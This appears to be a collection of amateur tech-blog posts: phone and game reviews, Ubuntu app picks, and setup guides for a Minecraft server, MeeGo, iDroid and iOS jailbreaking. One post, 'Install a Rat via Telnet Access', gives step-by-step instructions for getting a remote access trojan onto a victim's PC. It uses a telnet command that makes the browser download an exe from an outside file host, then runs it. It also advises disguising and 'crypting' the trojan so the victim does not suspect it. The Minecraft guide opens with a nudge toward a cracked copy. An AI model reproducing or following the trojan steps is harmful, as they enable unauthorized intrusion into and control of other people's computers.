HTC Desire HD Review

The phone itself isn’t to bad I mean for a smartphone currently the phone fuctions better then any iPhone I have used so far and the speaker phone is not bad. That being said however I still have experanced my Android dialer app calling the wrong people a la 2.2.1 froyo a update that was recently released for my HTC Desire HD. The speaker is the only real problem with the Desire HD’s phone capibilities. Its not a great sound on it I mean you can use it if your single or if your in a house with to and people arent screaming and shouting or listening to TV in the background. But for most honest everyday use the speaker is just not quite as loud as I wished it would be. But it still should be okay if you don’t really use it frequently. Next up I guess is the overall speed of the phone. Its great thats one of the top selling points of this phone. As of right now on the market purchasable today the HTC Desire HD is the best in its class. It has a great CPU that allows it to run any program Android can throw at it with ease. The CPU is easily overclockable to 1.5ghz if you root your phone but its stock is somewhere in the 1 ghtz range. Right now it outclases even the Google Nexus S but the Nexus S also has a great graphics card unlike the HTC Desire HD. Don’t get me wrong the Desire HD’s graphics card is still amazing but im talking top of the line possible right here not just good,ok, or great. So remember that when your like oh the graphics card isn’t as good its still blazingly fast. The Desire HD Sense UI which is its biggest selling point is actually not something that I enjoy in the slightest. Infact I dislike Sense immensly which is why right now I have it replaced with Launcher Pro. I dropped the few bucks and bought the Pro version and it was definitly worth it. It made the phone so snappy that it made iPhone 4′s self concious about there speed and ability. The widgets built in with Sense though should satisfy most users and I think the average purchaser will love the phone. The memory built in on my model that I bought from Vodaphone came with an 8 gig memory stick built in and im really not sure if thats the default or if thats just for my model. Now onto some of the more nitty gritty specs that most of you non nerds won’t really care about. The network card is b/g/n and can be used on any and all modern networks, the bluetooth is really lacking just becuase HTC has the languages locked to UK so bluetooth voice control is terrible so as of right now I hope you either can afford to buy Ear Buddy the Bluetooth replacment app for Android or you can deal with terrible bluetooth voice commands. But what you can do with Bluetooth is take calls and talk and for that the Bluetooth EDA 2.1+ chip is wonderful in the phone and the best you can possibly get right now. The Screen is absolutly beautiful and it mesures in at 800×480 which is a great rez and the screen is HUGE! You won’t know what hit you after you start looking at it your iPhone 4 will pale in size comparison this phone is a beast it feels so powerful that you don’t really know what to do with all that screen size and takes some time to adjust to it but when you really get into using the phone you will never want to go back to a smaller screen its like upgrading to a new 60inch HDTV. The Phone also has touch sensative buttons on the buttom panel that are just the default android Froyo buttons and do there functions just like they should. The phone also has flash player built into the browser as well as pinch to zoom which is not found yet in all android devices. The only real problem I have with the phone is its branding to HTC only apps and the fact that you can no longer change back to stock android they removed the original android applications from the phone and without a custom rom and rooting the phone you have no way to get them back which most people won’t enjoy. NOW THE BEST FEATURE the camera. Its completly gorgeous it records 720p video and the pictures are beautiful in fact they are close to the quality of DSLR digital camera. The phone allows you to focus in on certain points and do effects as you shoot seeing the objects live and changed to there no focus. The camera has an 8.2 megapixle sensor in it with dual led flash that can be used whenever you want and also the flash can be used for video recording during night situtations. The phone has a built in image editor from HTC that does pretty much anything you could possibly think of and it also allows you to share images with any network including facebook, myspace,flickr,dropbox, and your own home networks. So the verdict is buy if you like the phone’s look and if you don’t need the stock apps and if you are fine with branding of HTC Sense becuase it will really be the deal maker or breaker for you. The one and only really lacking feature is the lack of front facing camera so note that when you buy it if you need it get another phone but if you don’t buy the Desire HD right now while they are going hot. Its a wonderful phone and a great purchase.

How to Set up Minecraft Alpha Server FREE

Okay so its pretty easy to find a cracked MineCraft Alpha cough…… clickme …. cough …. yeah now that you have that you probobly want to play with some friends right! And heres just how to do that in a simple step by step guide.

How to Set up Your Server

Before you attempt to do this you need to know what an ip is what your local ip is and what your wan ip is!!!! and what port forwarding is if you don’t know what portforwarding is google it there is an easy site with guides on how to do it.Now on to the guide.

1st. Download “http://www.minecraft.net/download/Minecraft_Server.exe?v=1291149280252″.

2nd.Run that on your Desktop then close it when it finishes running.

3rd.Now open up the server.properties with notepad.

4th.Edit the IP to your computers IP you can find that by typing ipconfig /all or use my easy python script!

5th.Edit online status to false.

6th.Edit pvp on or off using true or false.

7th.Log into your router usually 192.168.1.1 or if your using my python script the bottom number.

8th. Now find the portforwarding setting.

9th. Make a new rule name it minecraft. Forward to internal IP your IP from earlier. Then choose tcp and udp as the option then type in port number 25565 for all the options showing and click save.

10th. Tell you friends your Routers IP Address you found using my script or google “my wan ip” to find it.

11th. Give them the IP like this “myip:25565″ and when they enter it all and click connect you should be running smooth if you have the server up.

Install a Rat via Telnet Access

So heres the case you got you do a scan on someones router there telnet port is open you log in HOLYCOW your in maybe its a local network maybe its public who cares. You have telnet access and you feel like you got all the power in the world but what can you really do its a windows box and dos aint got shit so you have no commands to use to hack this guy. Your sitting there wishing you had a bot so you could really get all over this guy and hack him. Well heres how you can get exactly what you want your rat on his computer .

How to get your RAT on the victims PC

Before I tell you how this is going to take a little bit of luck!! If your user is to suspicious then this probably isn’t going to work and you will have to have internet connection on the targets computer. Okay so.

1st. Open up telnet prompt to your victim.

2nd.In telnet type

“C:\Program Files\Internet Explorer\iexplore.exe” www.whateveryourhostis.com\whateveryourfilename.exe

Basically your going to have to upload your rat to a file hosting site anyone will do.

3rd.I would recommend naming your rat something legit like internet patch for windows or something.

4th.Hopefully your site name and your exe name will trust them to save it if they do your good and all you have to do is open up another telnet line and type.

“C:\Users\whatevertherenameis\Downloads\whateveryourfilename.exe”

5th.Sit back and enjoy your brand new remote access control to there computer. However be noted that its best to have your server crypted named and hosted by a legitimate site so that the user is not suspicious.

Top 5 Ubuntu Apps Updated

So it seems like alot of you are checking out my last top 10 for Ubuntu and I published that quite a while ago so im going to post my current top applications for Ubuntu!

**Some of these are not just regular user friendly applications**

The Top 5 Applications

#1 Docky

Docky is by far the best and most polished piece of software that is available for Ubuntu at this time it reminds me of the MAC OS dock in many ways but its completely free and works wonderfully on Ubuntu. It offers themes customization drag and drop features and many other great things so check it out.

#2 DeadBeeF

My number 2 has to definitely be DeadBeeF not even because its the best media player for Ubuntu but for the fact that it does absolutely everything I want to be able to do with a media player and in the cleanest fashion possible. It doesn’t have applet support for the integrated media controls in Ubuntu. But still definitely worth your time if you want a media player that works great on older computers or netbooks it has a very small system resource.

#3 Geany IDE

Geany is my replacement for Integrated development environments for programming. I program in a very large amount of languages and I love how Geany lets me do all of them and has easy compliers and executors built into it and makes programming dead simple. Definitely an application to check out!

#4 CoverGloobus

CoverGloobus is an artwork display application for Ubuntu it makes listening to music so much fun on Ubuntu. It just displays a simple control overlay or a piece of cover artwork on your desktop. Basically check it out its theme able and if you listen to music I am sure it will just make your day.

#5 Irssi

Irssi if you do any IRC this is the only application for you to use peroid. Nothing else works like Irssi and it just has that hacker feel to it if you use it im sure you will love it. The graphical portion in the console is absolutly beautiful and even if you don’t use IRC its so small and clean that I recommended you install it just to have it in case.

Call of Duty Black Ops PC Review

Call of Duty Black Ops for PC can be summed up in one simple statement “Don’t do it!” thats pretty much my feelings on it. The game costs 60 dollars and on Steam 60 dollars goes a really really long way you could buy 6 games for that and this games just not worth it. Compared to Call of Duty 4, WaW,MW2, this game is just terrible. Its great on its console counter parts but on the PC its riddled with problems. I have a decent gaming computer overclocked dual core black edition CPU 2 4870′s and 4 gigs of ram. Granted not the most modern system in the world but should definitely be ok to run a game like this on low. But no of course it can’t the game is riddled with stuttering problems and no matter how good your PC is the gameplay is just not good. Even single player has problems. Maybe I am being bias but I think a game should have a little more compatibility than what Black Ops has. If you want my honest opinion don’t buy the game just don’t do it instead buy Crysis 2 or Assassins Creed 3 or something. Anyway Call of Duty Black Ops is terrible sorry to burst your bubble buy it for console if you want to play it.

Meego Linux Review

So I played with Meego when it was initially released but I found it to be to unstable to use for my netbook which I actually needed at the time. But when the new release came out I found it in my heart to take the new baby penguin in and give it a fair look over and what I found was actually impressive. First compatibility with everything no customization needed with my netbook at all every driver was in working order. Next onto the interface its great for a netbook and this is the one and only reason why I would use this over Ubuntu or any other *NIX OS. They made everything actually useable for a netbook screensize by breaking up every application to its own window and using a key to escape back to the main menu overlay. As far as I can tell right now this method works great and is a good way to work on a netbook PC. So for now im going to give it a thumbs up but only if your using the netbook as not your primary computer if you need a real workhorse or some stability and compatibility go with either Windows, Ubuntu, or other Linux based OS of your choice. MeeGo: Fix MSN Messenger Network Error!!

Hello today I installed MeeGo on my Acer Aspire One Netbook and I have found that there is a network error when I try to add it to Empathy so im adding a fix for all you MeeGo users out there or soon to be MeeGo’ers and heres how to do it!

How To Fix

1st. Go to the Applications tab on the top.

2nd. Navigate to system tools.

3rd.Open up Terminal.

4th. Type “sudo zypper install python-crypto”without quotes.

5th. Now type “sudo gedit /usr/lib/python2.6/site-packages/papyon/service/description/SingleSignOn/RequestMultipleSecurityTokens.py” without quotes.

6th. Navigate down to the line where it says

CONTACTS = (“contacts.msn.com”, “?fs=1&id=24000&kv=7&rn=93S9SWWw&tw=0&ver=2.1.6000.1″)

and change the line to say.

CONTACTS = (“contacts.msn.com”, “MBI”)

How to install Android on your iPhone or iPod Touch

Before I really get into the steps on how to do this I have to tell you which devices you can actually use this on. Right now you can use it on the iPhone 1st gen iPhone 2nd gen and iPod Touch first gen this guide I will be showing how to do it for the iPod touch but everything is identical for the other devices except the openiboot.img3 and the ./oibc and the ./loadibec. So just to let you know most things don’t work that well with android and this will overwrite your flash on your iPhone so you could brick it and I am not responsible if you do break your iPhone even if the chances are very slim. So now onto the guide.

How To – Install iDroid

1st.Method if Bootlace works.

1st. You must have a jailbroken iPod or iPhone and you must either have jailbroken with redsn0w or blackra1n not with snowbreeze or jailbreakme.com or anything else.

2nd. On you iPod or iPhone go into cydia and add this source without quotes. http://repo.neonkoala.co.uk.

3rd. Search and install the application known as Bootlace.

4th. If possible go to the openiboot tab of bootlace and click install wait for download and install then go to idroid tab and click install. If that works than your fine and you don’t have to use ubuntu at all. But if you cannot install openiboot you will have to do so manually.

Method 2 – No Bootloader from Bootlace Method.

1st. Go and download an ubuntu iso from www.ubuntu.com then burn to usb using the guide on the site.

2nd. Reboot you computer with the USB plugged in to boot from it. If it doesent boot you will have to change your bios settings by clicking the key you bootscreen says on bootup for setup.

3rd. Download Bootlace on iPod Touch or iPhone.

4th. Click on the iDroid tab and click install.

5th. Now on you computer booted into a live ubuntu distro turn off your iPod.

6th.Plug it in whilst holding down the home button until the iTunes symbol appears.

7th. Now go to accesories Terminal and type without quotes “
sudo apt-get install libusb-1.0-0 libusb-1.0-0-dev libreadline6-dev readline-common libreadline6 libreadline-dev”
8th. Now wait for that to finish type in the password you set earlier.
9th. Now go to http://idroid.nickpack.com/openiBoot/ and download the bundle for your version of device.
10th. Extract it all to desktop.
11th. Now go into the tools folder you extracted and move the files for linux x86 to your desktop.
12th. In terminal type su.
13th. Now cd Desktop.
14th. Now with the iPod plugged in type without quotes “./loadibec”
15th. Now wait for Welcome to OpeniBoot.
16th. Now type without quotes “./oibec”
17th. Now wait for a promt then type without quotes “install”
18th. Wait for the process to completly finish should take about a minuet. Then type without quotes “reboot”.
19th. You should be at a menu with either iOS Terminal or linux press the power button or volume buttons to scroll up and down and the home button to boot os.
20th. If you are stuck at Terminal mode open a new terminal on your computer and type.
21st. “su” then type “cd Desktop” then type “./oibec” then type “printenv” then type “

setenv opib-hide-menu false” then type “saveenv”. Now wait and then type “reboot” and you will be fine.

As Americans from the time we are small children were brought up to believe that we are the best at everything we do and were the greatest and we deserve to be treated better and get more then we currently have. I think this causes some problems for Americans that are in relationships. In a relationship you are part of a group or a pair you don’t deserve any more then that other person you are with they should be your everything. When you think about doing something for yourself you should also consider how it will make them feel before you make the decision. I know in my life I have made some terrible decisions in relationships where I didn’t consider the other person at all when I made my choice. It was one of the biggest mistakes in my life. So just a warning if you want to be the good one in a realtionship always step back and look at what your doing before you do it hopefully the other person will be okay and agree with your decision. And always care for them.

How to jailbreak the iPod Touch 3G or iPhone 4 or iPad

When you think of the iPod Touch or iPhone you probobly first think about those irritatingly awesome apple ads and than after that the next connection you make is to jailbreaking and all those cool new things your friends showed you that you coulden’t do with you new iPhone 4. Well now you to can be part of the jailbroken iPod crew and thanks to a new bill passed and DCMA exception passed jailbreaking your own iPod or iPhone is now legal and simpler than ever. So now onto the how to guide.

How to Jailbreak

1st.Open up the safari browser on your iOS device of choice.

2nd. Browse to jailbreakme.com and than slide the slider.

3rd. Now wait until the jailbreak is complete.

4th. Thats it your done see its so simple a monkey could do it ;P.

Once you jailbreak you will get a new application called Cydia which is basically the jailbroken app store from which you will get all your cool jailbroken goodies. Stay tuned for more top 10′s and top jailbroken iOS 4 applications.
